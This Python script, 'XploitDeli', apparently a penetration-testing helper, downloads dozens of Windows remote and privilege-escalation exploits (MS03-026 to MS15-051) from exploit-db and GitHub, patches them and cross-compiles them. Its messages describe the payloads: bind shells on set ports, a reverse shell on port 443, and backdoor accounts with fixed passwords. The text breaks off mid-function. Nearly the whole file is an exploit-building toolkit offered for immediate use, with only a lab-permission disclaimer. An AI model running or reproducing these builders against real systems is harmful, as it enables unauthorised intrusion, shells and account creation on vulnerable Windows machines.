  1. #!/usr/bin/python
  2.  
  3. ###################################################
  4. #
  5. #   XploitDeli - written by Justin Ohneiser
  6. # ------------------------------------------------
  7. # This program produces a variety of exploits
  8. # found on exploit-db for immediate use.
  9. #
  10. # Note: options with an asterisk either don't work
  11. # or require compilation on the target.
  12. #
  13. # [Warning]:
  14. # This script comes as-is with no promise of functionality or accuracy.  I strictly wrote it for personal use
  15. # I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
  16. # functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
  17. # target machines in a lab environment so please only use it against systems for which you have permission!!
  18. #-------------------------------------------------------------------------------------------------------------
  19. # [Modification, Distribution, and Attribution]:
  20. # You are free to modify and/or distribute this script as you wish.  I only ask that you maintain original
  21. # author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
  22. # worth anything anyway :)
  23. #
  24. # Designed for use in Kali Linux 4.6.0-kali1-686
  25. ###################################################
  26.  
  27. import sys, os, subprocess
  28.  
  29. # ------------------------------------
  30. # WINDOWS REMOTE
  31. # ------------------------------------
  32.  
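def windows_exploit_suggester():
    """Fetch Windows-Exploit-Suggester from GitHub and run its database update.

    Steps are (label, shell command) pairs executed by run(), which is defined
    elsewhere in this file; printGood() prints the usage hint on success.
    The archive is pulled from the moving ``master`` branch with no checksum or
    signature check, and the ``-u`` step executes the freshly downloaded
    script on this host straight away.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/GDSSecurity/Windows-Exploit-Suggester/archive/master.zip'),
        # Label typo fixed (was 'Upacking...') so it matches the other fetchers.
        ('Unpacking...', 'unzip master.zip; cp Windows-Exploit-Suggester-master/windows-exploit-suggester.py .'),
        ('Updating...', './windows-exploit-suggester.py -u'),
        ('Cleaning up...', 'rm master.zip; rm -r Windows-Exploit-Suggester-master'),
    ]
    if not run(steps):
        return
    printGood("windows-exploit-suggester.py successfully created\n\tUsage: ./windows-exploit-suggester.py -d <database file> -o <os description> [--remote | --local]")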
  42.  
def ms03_026():
    """Download exploit-db entry 100 and cross-compile it into ms03-026.exe.

    Steps are (label, shell command) pairs handed to run(), defined elsewhere
    in this file; printGood() reports success. The fetched source is not
    integrity-checked (no hash or signature) before it is compiled.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/100 -O ms03-026.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms03-026.c -o ms03-026.exe -lws2_32'),
        ('Cleaning up...', 'rm ms03-026.c'),
    ]
    if not run(steps):
        return
    printGood("ms03-026.exe successfully created\n\t - creates user 'e' and pass 'asd#321'")
  51.  
def ms03_039_1():
    """Download exploit-db entry 103 and cross-compile it into ms03-039.exe.

    run() and printGood() are defined elsewhere in this file. The download is
    not verified against any checksum before compilation.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/103 -O ms03-039.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms03-039.c -o ms03-039.exe -lws2_32'),
        ('Cleaning up...', 'rm ms03-039.c'),
    ]
    if not run(steps):
        return
    printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
  60.  
def ms03_039_2():
    """Download exploit-db entry 109 (C++ variant) and build ms03-039.exe.

    Same output name as ms03_039_1, so running both overwrites the binary.
    run() and printGood() are defined elsewhere in this file; the source is
    compiled without any integrity check.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/109 -O ms03-039.cpp'),
        ('Compiling...', 'i686-w64-mingw32-g++ ms03-039.cpp -o ms03-039.exe -lws2_32'),
        ('Cleaning up...', 'rm ms03-039.cpp'),
    ]
    if not run(steps):
        return
    printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
  69.  
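def ms03_049():
    """Download exploit-db entry 119 and cross-compile it into ms03-049.exe.

    run() and printGood() are defined elsewhere in this file. The success
    message previously named ms03-039.exe, which is not the file this builds;
    it now names ms03-049.exe. The source is compiled without any integrity
    check.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/119 -O ms03-049.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms03-049.c -o ms03-049.exe -lws2_32'),
        ('Cleaning up...', 'rm ms03-049.c'),
    ]
    if not run(steps):
        return
    printGood("ms03-049.exe successfully created\n\t - spawns bind shell on port 5555")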
  78.  
def ms04_007():
    """Fetch the exploit-db binary archive 3022 and unpack it in place.

    Nothing is compiled here; the tarball contents are used as shipped.
    run() and printGood() are defined elsewhere in this file; the archive is
    fetched from the moving ``master`` branch with no checksum check.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz -O ms04-007.tar.gz'),
        ('Unpacking...', 'tar xvzf ms04-007.tar.gz'),
        ('Cleaning up...', 'rm ms04-007.tar.gz'),
    ]
    if not run(steps):
        return
    printGood("kill-bill/kill-bill.pl successfully created\n\t - spawns and connects to bind shell on port 8721")
  87.  
def ms04_011_sslbof():
    """Download exploit-db entry 275 and cross-compile it into ms04-011.exe.

    ms04_011_lsasarv and ms04_011_local write the same file name, so the
    last one run wins. run() and printGood() are defined elsewhere in this
    file; no integrity check is applied to the download.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/275 -O ms04-011.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
        ('Cleaning up...', 'rm ms04-011.c'),
    ]
    if not run(steps):
        return
    printGood("ms04-011.exe successfully created\n\t - spawns and connects reverse shell on port 443")
  96.  
def ms04_011_lsasarv():
    """Download exploit-db entry 295 and cross-compile it into ms04-011.exe.

    Shares its output name with ms04_011_sslbof and ms04_011_local. run()
    and printGood() are defined elsewhere in this file; the source is not
    integrity-checked before compilation.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/295 -O ms04-011.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
        ('Cleaning up...', 'rm ms04-011.c'),
    ]
    if not run(steps):
        return
    printGood("ms04-011.exe successfully created\n\t - spawns bind shell on given port")
  105.  
def ms04_031():
    """Download exploit-db entry 734 and cross-compile it into ms04-031.exe.

    run() and printGood() are defined elsewhere in this file; the download
    is compiled as-is with no hash or signature verification.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/734 -O ms04-031.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms04-031.c -o ms04-031.exe -lws2_32'),
        ('Cleaning up...', 'rm ms04-031.c'),
    ]
    if not run(steps):
        return
    printGood("ms04-031.exe successfully created\n\t - spawns bind shell on given port")
  114.  
def ms05_017():
    """Download exploit-db entry 1075 and cross-compile it into ms05-017.exe.

    run() and printGood() are defined elsewhere in this file; no integrity
    check is performed on the downloaded source.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/1075 -O ms05-017.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms05-017.c -o ms05-017.exe -lws2_32'),
        ('Cleaning up...', 'rm ms05-017.c'),
    ]
    if not run(steps):
        return
    printGood("ms05-017.exe successfully created\n\t - spawns bind shell on given port")
  123.  
def ms05_039():
    """Download exploit-db entry 1149 and cross-compile it into ms05-039.exe.

    run() and printGood() are defined elsewhere in this file; the source is
    compiled without any checksum verification.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/1149 -O ms05-039.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms05-039.c -o ms05-039.exe -lws2_32'),
        ('Cleaning up...', 'rm ms05-039.c'),
    ]
    if not run(steps):
        return
    printGood("ms05-039.exe successfully created\n\t - spawns bind shell on given port")
  132.  
def ms06_040_1():
    """Download exploit-db entry 2223 and cross-compile it into ms06-040.exe.

    Listed with a '*' in the menu (header: does not work or needs target-side
    compilation). run() and printGood() are defined elsewhere in this file;
    the download is not integrity-checked.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/2223 -O ms06-040.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
        ('Cleaning up...', 'rm ms06-040.c'),
    ]
    if not run(steps):
        return
    printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 54321")
  141.  
def ms06_040_2():
    """Download exploit-db entry 2265, patch it with sed, and build ms06-040.exe.

    The 'Fixing...' step rewrites a WNetAddConnection2 check into a constant
    false so the source compiles under mingw. run() and printGood() are
    defined elsewhere in this file; no integrity check is applied.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/2265 -O ms06-040.c'),
        ('Fixing...', "sed -i 's/WNetAddConnection2(&nr, \"\", \"\", 0) != NO_ERROR/1==2/g' ms06-040.c;"),
        ('Compiling...', 'i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
        ('Cleaning up...', 'rm ms06-040.c'),
    ]
    if not run(steps):
        return
    printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 4444")
  151.  
def ms06_070():
    """Download exploit-db entry 2789, sed-patch the source, and build ms06-070.exe.

    The 'Fixing...' step closes a string and comments out a line that the
    compiler otherwise rejects. run() and printGood() are defined elsewhere
    in this file; the download is compiled without verification.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/2789 -O ms06-070.c'),
        ('Fixing...', "sed -i 's/more informations/more informations\");/g' ms06-070.c; sed -i 's/see/\/\/see/g' ms06-070.c"),
        ('Compiling...', 'i686-w64-mingw32-gcc ms06-070.c -o ms06-070.exe -lws2_32'),
        ('Cleaning up...', 'rm ms06-070.c'),
    ]
    if not run(steps):
        return
    printGood("ms06-070.exe successfully created\n\t - spawns bind shell on port 4444")
  161.  
def ms08_067_1():
    """Download exploit-db entry 7104 and cross-compile it into ms08-067.exe.

    Listed with a '*' in the menu. run() and printGood() are defined
    elsewhere in this file; the source is not integrity-checked.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/7104 -O ms08-067.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms08-067.c -o ms08-067.exe -lws2_32'),
        ('Cleaning up...', 'rm ms08-067.c'),
    ]
    if not run(steps):
        return
    printGood("ms08-067.exe successfully created\n\t - spawns bind shell on port 4444")
  170.  
def ms08_067_2():
    """Download exploit-db entry 7132 as ms08-067.py and mark it executable.

    run() and printGood() are defined elsewhere in this file. The script is
    stored unverified; nothing here inspects it before it is made runnable.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/7132 -O ms08-067.py'),
        ('Preparing...', 'chmod 744 ms08-067.py'),
    ]
    if not run(steps):
        return
    printGood("ms08-067.py successfully created\n\t - spawns bind shell on 4444")
  178.  
def ms08_067_3():
    """Fetch the prebuilt exploit-db binary archive 6841 and extract ms08-067.exe.

    This is a precompiled executable taken from the repository's ``master``
    branch with no checksum or signature check. run() and printGood() are
    defined elsewhere in this file.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6841.rar -O ms08-067.rar'),
        ('Unpacking...', 'mkdir ms08-067; cd ms08-067; unrar e ../ms08-067.rar'),
        ('Cleaning up...', 'rm ms08-067.rar; cp ms08-067/MS08-067.exe ms08-067.exe; rm -r ms08-067'),
    ]
    if not run(steps):
        return
    printGood("ms08-067.exe successfully created\n\t")
  187.  
def ms09_050():
    """Fetch exploit-db archive 14674, unpack it, and build smb2_exploit.exe in place.

    Note the cleanup step runs before compilation, and the unpacked directory
    is left behind. Listed with a '*' in the menu. run() and printGood() are
    defined elsewhere in this file; the archive is not integrity-checked.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip -O ms09-050.zip'),
        ('Unpacking...', 'unzip ms09-050.zip'),
        ('Cleaning up...', 'rm ms09-050.zip'),
        ('Compiling...', 'cd smb2_exploit_release/smb2_exploit; i686-w64-mingw32-g++ smb2_exploit.cpp -o smb2_exploit.exe -lws2_32'),
    ]
    if not run(steps):
        return
    printGood("/smb2_exploit_release/smb2_exploit/smb2_exploit.exe successfully created\n\t - spawns bind shell on 28876")
  197.  
# Menu table for the "Windows remote" category: (display label, builder).
# A leading '*' on a label marks an option the file header describes as either
# not working or requiring compilation on the target.
exploits_windows_remote = [
    ("windows_exploit_suggester", windows_exploit_suggester),
    ("ms03-026", ms03_026),
    ("ms03-039 (1)", ms03_039_1),
    ("ms03-039 (2)", ms03_039_2),
    ("*ms03-049", ms03_049),
    ("ms04-007", ms04_007),
    ("ms04-011 - ssl bof", ms04_011_sslbof),
    ("ms04-011 - lsasarv.dll", ms04_011_lsasarv),
    ("ms04-031", ms04_031),
    ("ms05-017", ms05_017),
    ("ms05-039", ms05_039),
    ("*ms06-040 (1)", ms06_040_1),
    ("ms06-040 (2)", ms06_040_2),
    ("ms06-070", ms06_070),
    ("*ms08-067 (1)", ms08_067_1),
    ("ms08-067 (2)", ms08_067_2),
    ("ms08-067 (3)", ms08_067_3),
    ("*ms09-050", ms09_050),
]
  218.  
  219. # ------------------------------------
  220. # WINDOWS LOCAL
  221. # ------------------------------------
  222.  
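def windows_privesc_check():
    """Fetch windows-privesc-check from GitHub and keep its prebuilt exe.

    The archive comes from the moving ``master`` branch and the extracted
    binary is used as shipped, with no checksum or signature check. run() and
    printGood() are defined elsewhere in this file. The 'Unpacking' label now
    carries the trailing ellipsis every other step label uses.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip -O windows-privesc-check.zip'),
        ('Unpacking...', 'unzip windows-privesc-check.zip; cp windows-privesc-check-master/windows-privesc-check2.exe .'),
        ('Cleaning up...', 'rm windows-privesc-check.zip; rm -r windows-privesc-check-master'),
    ]
    if not run(steps):
        return
    printGood("windows-privesc-check2.exe successfully created")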
  231.  
def ms04_011_local():
    """Download exploit-db entry 271, fix a header include case, and build ms04-011.exe.

    Output name collides with the two remote ms04_011 builders. run() and
    printGood() are defined elsewhere in this file; the source is compiled
    without integrity verification.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/271 -O ms04-011.c'),
        ('Fixing...', "sed -i 's/Winuser.h/winuser.h/g' ms04-011.c"),
        ('Compiling...', 'i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -I/usr/i686-w64-mingw32/include/'),
        ('Cleaning up...', 'rm ms04-011.c'),
    ]
    if not run(steps):
        return
    printGood("ms04-011.exe successfully created\n\t")
  241.  
def ms04_019_1():
    """Download exploit-db entry 350, sed-patch stray prose in it, and build ms04-019.exe.

    The 'Fixing...' step closes an unterminated string and comments out
    several lines of embedded text so mingw accepts the file. run() and
    printGood() are defined elsewhere in this file; no integrity check.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/350 -O ms04-019.c'),
        ('Fixing...', "sed -i 's/Utility Manager and then/Utility Manager and then run\");/g' ms04-019.c; sed -i 's/run UtilManExploit2.exe/\/\/run UtilManExploit2.exe/g' ms04-019.c; sed -i 's/in the taskbar/\/\/in the taskbar/g' ms04-019.c; sed -i 's/lParam must be/\/\/lParam must be/g' ms04-019.c; sed -i 's/close open error window/\/\/close open error window/g' ms04-019.c; sed -i 's/close utility manager/\/\/close utility manager/g' ms04-019.c"),
        ('Compiling...', 'i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
        ('Cleaning up...', 'rm ms04-019.c'),
    ]
    if not run(steps):
        return
    printGood("ms04-019.exe successfully created\n\t - run 'utilman.exe /start', then execute")
  251.  
def ms04_019_2():
    """Download exploit-db entry 352 and cross-compile it into ms04-019.exe.

    Same output name as ms04_019_1 and ms04_019_3. run() and printGood()
    are defined elsewhere in this file; the download is not verified.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/352 -O ms04-019.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
        ('Cleaning up...', 'rm ms04-019.c'),
    ]
    if not run(steps):
        return
    printGood("ms04-019.exe successfully created\n\t")
  260.  
def ms04_019_3():
    """Download exploit-db entry 355 and cross-compile it into ms04-019.exe.

    Same output name as the other ms04_019 builders. run() and printGood()
    are defined elsewhere in this file; no integrity check is applied.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/355 -O ms04-019.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
        ('Cleaning up...', 'rm ms04-019.c'),
    ]
    if not run(steps):
        return
    printGood("ms04-019.exe successfully created\n\t")
  269.  
def ms04_020():
    """Download exploit-db entry 351, sed-patch it for mingw, and build ms04-020.exe.

    The 'Fixing...' step lower-cases a header include and comments out two
    lines. run() and printGood() are defined elsewhere in this file; the
    source is compiled without verification.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/351 -O ms04-020.c'),
        ('Fixing...', "sed -i 's/Winsock2.h/winsock2.h/g' ms04-020.c; sed -i 's/_snprintf/\/\/_snprintf/g' ms04-020.c; sed -i 's/pax -h/\/\/pax -h/g' ms04-020.c"),
        ('Compiling...', 'i686-w64-mingw32-gcc ms04-020.c -o ms04-020.exe -lws2_32'),
        ('Cleaning up...', 'rm ms04-020.c'),
    ]
    if not run(steps):
        return
    printGood("ms04-020.exe successfully created\n\t")
  279.  
def keybd():
    """Download exploit-db entry 1197 and cross-compile it into keybd.exe.

    Listed with a '*' in the menu. run() and printGood() are defined
    elsewhere in this file; the download is not integrity-checked. The usage
    hint text is reproduced unchanged from the original.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/1197 -O keybd.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc keybd.c -o keybd.exe -lws2_32'),
        ('Cleaning up...', 'rm keybd.c'),
    ]
    if not run(steps):
        return
    printGood("keybd.exe successfully created\n\t - run 'runas /user:restrcited cmd.exe', 'tlist.exe | find \"explorer.exe\"' (get pid), then run keybd.exe <pid>")
  288.  
def ms05_018():
    """Download exploit-db entry 1198 and cross-compile it into ms05-018.exe.

    Listed with a '*' in the menu; the compile line passes ``advapi32.lib``
    as a bare argument, which looks like an MSVC-style link input rather
    than a mingw ``-l`` flag (unverified). run() and printGood() are defined
    elsewhere in this file; no integrity check on the download.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/1198 -O ms05-018.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms05-018.c -o ms05-018.exe -lws2_32 advapi32.lib'),
        ('Cleaning up...', 'rm ms05-018.c'),
    ]
    if not run(steps):
        return
    printGood("ms05-018.exe successfully created\n\t")
  297.  
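def ms05_055():
    """Download exploit-db entry 1407 and build ms05-055.exe with the C++ driver.

    Listed with a '*' in the menu. run() and printGood() are defined
    elsewhere in this file; the source is compiled without verification.
    The success message spelling ('successfuly') is corrected here.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/1407 -O ms05-055.c'),
        ('Compiling...', 'i686-w64-mingw32-g++ ms05-055.c -o ms05-055.exe -lws2_32'),
        ('Cleaning up...', 'rm ms05-055.c'),
    ]
    if not run(steps):
        return
    printGood("ms05-055.exe successfully created\n\t")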
  306.  
def ms06_030():
    """Download exploit-db entry 1911 and cross-compile it into ms06-030.exe.

    run() and printGood() are defined elsewhere in this file; the download
    is not integrity-checked before compilation.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/1911 -O ms06-030.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms06-030.c -o ms06-030.exe -lws2_32'),
        ('Cleaning up...', 'rm ms06-030.c'),
    ]
    if not run(steps):
        return
    printGood("ms06-030.exe successfully created\n\t")
  315.  
def ms06_049():
    """Download exploit-db entry 2412 and cross-compile it into ms06-049.exe.

    run() and printGood() are defined elsewhere in this file; no checksum
    or signature check is applied to the source.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/2412 -O ms06-049.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms06-049.c -o ms06-049.exe -lws2_32'),
        ('Cleaning up...', 'rm ms06-049.c'),
    ]
    if not run(steps):
        return
    printGood("ms06-049.exe successfully created\n\t")
  324.  
def spool():
    """Download exploit-db entry 3220, sed-patch it for mingw, and build spool.exe.

    The 'Fixing...' step lower-cases a header include and comments out an
    EnumPrintersA line. run() and printGood() are defined elsewhere in this
    file; the download is compiled without verification.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/3220 -O spool.c'),
        ('Fixing...', "sed -i 's/Winspool.h/winspool.h/g' spool.c; sed -i 's/EnumPrintersA/\/\/EnumPrintersA/g' spool.c"),
        ('Compiling...', 'i686-w64-mingw32-gcc spool.c -o spool.exe'),
        ('Cleaning up...', 'rm spool.c'),
    ]
    if not run(steps):
        return
    printGood("spool.exe successfully created\n\t - spawns bindshell on port 51477")
  334.  
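def ms08_025():
    """Fetch exploit-db archive 5518, unpack it, and build ms08-025.exe.

    Listed with a '*' in the menu. run() and printGood() are defined
    elsewhere in this file; the archive is pulled from ``master`` with no
    checksum check. The success message now names the file the compile step
    actually writes (ms08-025.exe, previously reported as ms08_025.exe).
    """
    steps = [
        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip -O ms08-025.zip'),
        ('Unpacking...', 'mkdir ms08-025; cd ms08-025;unzip ../ms08-025.zip'),
        ('Compiling...', 'cd ms08-025; i686-w64-mingw32-gcc ms08-25-exploit.cpp -o ../ms08-025.exe -lws2_32'),
        ('Cleaning up...', 'rm ms08-025.zip; rm -r ms08-025'),
    ]
    if not run(steps):
        return
    printGood("ms08-025.exe successfully created\n\t")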
  344.  
def netdde():
    """Download exploit-db entry 21923, comment out stray prose, and build netdde.exe.

    run() and printGood() are defined elsewhere in this file; the source is
    compiled as-is apart from the sed edits, with no integrity check.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/21923 -O netdde.c'),
        ('Fixing...', "sed -i 's/source:/\/\/source:/g' netdde.c; sed -i 's/The Winlogon/\/\/The Winlogon/g' netdde.c"),
        ('Compiling...', 'i686-w64-mingw32-gcc netdde.c -o netdde.exe'),
        ('Cleaning up...', 'rm netdde.c'),
    ]
    if not run(steps):
        return
    printGood("netdde.exe successfully created\n\t")
  354.  
def ms10_015():
    """Fetch exploit-db archive 11199 and keep its prebuilt vdmallowed.exe as ms10-015.exe.

    This is a precompiled binary from the repository's ``master`` branch,
    used without any checksum or signature check. run() and printGood() are
    defined elsewhere in this file.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip -O ms10-015.zip'),
        ('Unpacking...', 'unzip ms10-015.zip; cp KiTrap0D/vdmallowed.exe ms10-015.exe'),
        ('Cleaning up...', 'rm ms10-015.zip; rm -r KiTrap0D'),
    ]
    if not run(steps):
        return
    printGood("ms10-015.exe successfully created\n\t")
  363.  
def ms10_059():
    """Fetch exploit-db archive 14610, unpack it, and build ms10-059.exe.

    run() and printGood() are defined elsewhere in this file; the archive is
    pulled from ``master`` and compiled without integrity verification.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14610.zip -O ms10-059.zip'),
        ('Unpacking...', 'unzip ms10-059.zip'),
        ('Compiling...', 'cd Chimichurri; i686-w64-mingw32-g++ Chimichurri.cpp -o ../ms10-059.exe -lws2_32'),
        ('Cleaning up...', 'rm ms10-059.zip; rm -r Chimichurri'),
    ]
    if not run(steps):
        return
    printGood("ms10-059.exe successfully created\n\t")
  373.  
def ms10_092():
    """Download exploit-db entry 15589 as ms10-092.wsf.

    Single download step, no compilation, no integrity check on the file.
    run() and printGood() are defined elsewhere in this file.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/15589 -O ms10-092.wsf'),
    ]
    if not run(steps):
        return
    printGood("ms10-092.wsf successfully created\n\t - use 'cscript ms10-092.wsf' to execute")
  380.  
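def ms11_080():
    """Download exploit-db entry 18176 and bundle it with PyInstaller under Wine.

    Relies on a Wine prefix with Python 2.7 and /usr/share/pyinstaller
    present. run() and printGood() are defined elsewhere in this file; the
    script is not integrity-checked. The success message now names the file
    the cleanup step actually produces (ms11-080.exe, was ms11_080.exe).
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/18176 -O ms11-080.py'),
        ('Converting...', 'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms11-080.py'),
        ('Cleaning up...', 'cp dist/ms11-080.exe ms11-080.exe; rm ms11-080.py; rm -r dist build ms11-080.spec'),
    ]
    if not run(steps):
        return
    printGood("ms11-080.exe successfully created\n\t")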
  389.  
def ms14_040():
    """Download exploit-db entry 39525 and bundle it with PyInstaller under Wine.

    Same Wine/Python 2.7/PyInstaller prerequisites as ms11_080. run() and
    printGood() are defined elsewhere in this file; no integrity check.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/39525 -O ms14-040.py'),
        ('Converting...', 'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-040.py'),
        ('Cleaning up...', 'cp dist/ms14-040.exe ms14-040.exe; rm ms14-040.py; rm -r dist build ms14-040.spec'),
    ]
    if not run(steps):
        return
    printGood("ms14-040.exe successfully created")
  398.  
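def ms14_058_1():
    """Fetch exploit-db archive 39666, unpack it, and build ms14-058.exe.

    Listed with a '*' in the menu. run() and printGood() are defined
    elsewhere in this file; the archive is pulled from ``master`` and
    compiled without verification. The original printed an empty success
    message; it now names the produced file like the other builders.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip -O ms14-058.zip'),
        ('Unpacking...', 'unzip ms14-058.zip'),
        ('Compiling...', 'cd 39666/Exploit/Exploit; i686-w64-mingw32-g++ Exploit.cpp -o ../../../ms14-058.exe -lws2_32'),
        ('Cleaning up...', 'rm ms14-058.zip; rm -r 39666 __MACOSX'),
    ]
    if not run(steps):
        return
    printGood("ms14-058.exe successfully created")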
  408.  
def ms14_058_2():
    """Download exploit-db entry 37064 and bundle it with PyInstaller under Wine.

    Writes the same ms14-058.exe as ms14_058_1. run() and printGood() are
    defined elsewhere in this file; the script is not integrity-checked.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/37064 -O ms14-058.py'),
        ('Converting...', 'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-058.py'),
        ('Cleaning up...', 'cp dist/ms14-058.exe ms14-058.exe; rm ms14-058.py; rm -r dist build ms14-058.spec'),
    ]
    if not run(steps):
        return
    printGood("ms14-058.exe successfully created\n\t")
  417.  
def ms14_070_1():
    """Download exploit-db entry 37755 and cross-compile it into ms14-070.exe.

    Listed with a '*' in the menu. run() and printGood() are defined
    elsewhere in this file; no integrity check on the download.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/37755 -O ms14-070.c'),
        ('Compiling...', 'i686-w64-mingw32-gcc ms14-070.c -o ms14-070.exe -lws2_32'),
        ('Cleaning up...', 'rm ms14-070.c'),
    ]
    if not run(steps):
        return
    printGood("ms14-070.exe successfully created\n\t")
  426.  
def ms14_070_2():
    """Download exploit-db entry 35936 and echo the PyInstaller command to run later.

    Nothing is converted here; the second step only prints the command.
    run() is defined elsewhere in this file and its result is ignored. The
    script is stored without any integrity check.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/35936 -O ms14-070.py'),
        ('Note: requires manual fixing, then execute the following command:', 'echo \'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-070.py\''),
    ])
  433.  
def ms15_010_1():
    """Fetch exploit-db archive 39035, fix header include case, and build ms15-010.exe.

    Listed with a '*' in the menu. run() and printGood() are defined
    elsewhere in this file; the archive comes from ``master`` and is compiled
    without verification.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip -O ms15_010.zip'),
        ('Unpacking...', 'unzip ms15_010.zip'),
        ('Fixing...', "cd 39035; sed -i 's/Strsafe.h/strsafe.h/g' main.cpp; sed -i 's/Shlwapi.h/shlwapi.h/g' main.cpp"),
        ('Compiling...', 'cd 39035; i686-w64-mingw32-g++ main.cpp -o ../ms15-010.exe'),
        ('Cleaning up...', 'rm ms15_010.zip; rm -r 39035'),
    ]
    if not run(steps):
        return
    printGood("ms15-010.exe successfully created\n\t")
  444.  
def ms15_010_2():
    """Download exploit-db entry 37098, split it into ex.cpp/ex.h by line count, and build ms15-010.exe.

    The head/tail split assumes a fixed layout of the downloaded file; the
    generated ex.cpp and ex.h are not removed by the cleanup step. Listed
    with a '*' in the menu. run() and printGood() are defined elsewhere in
    this file; no integrity check on the download.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/37098 -O ms15-010.cpp'),
        ('Fixing...', 'head -n 287 ms15-010.cpp > ex.cpp; tail -n 59 ms15-010.cpp > ex.h'),
        ('Compiling...', 'i686-w64-mingw32-g++ ex.cpp -o ms15-010.exe'),
        ('Cleaning up...', 'rm ms15-010.cpp'),
    ]
    if not run(steps):
        return
    printGood("ms15-010.exe successfully created")
  454.  
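def ms15_051():
    """Fetch the prebuilt 32- and 64-bit exploit-db binaries for entry 37049.

    Both are precompiled executables pulled from ``master`` with no checksum
    or signature check. run() and printGood() are defined elsewhere in this
    file. The success message now matches the second file name actually
    written (ms15-051_64.exe, previously reported as ms15_051_64.exe).
    """
    steps = [
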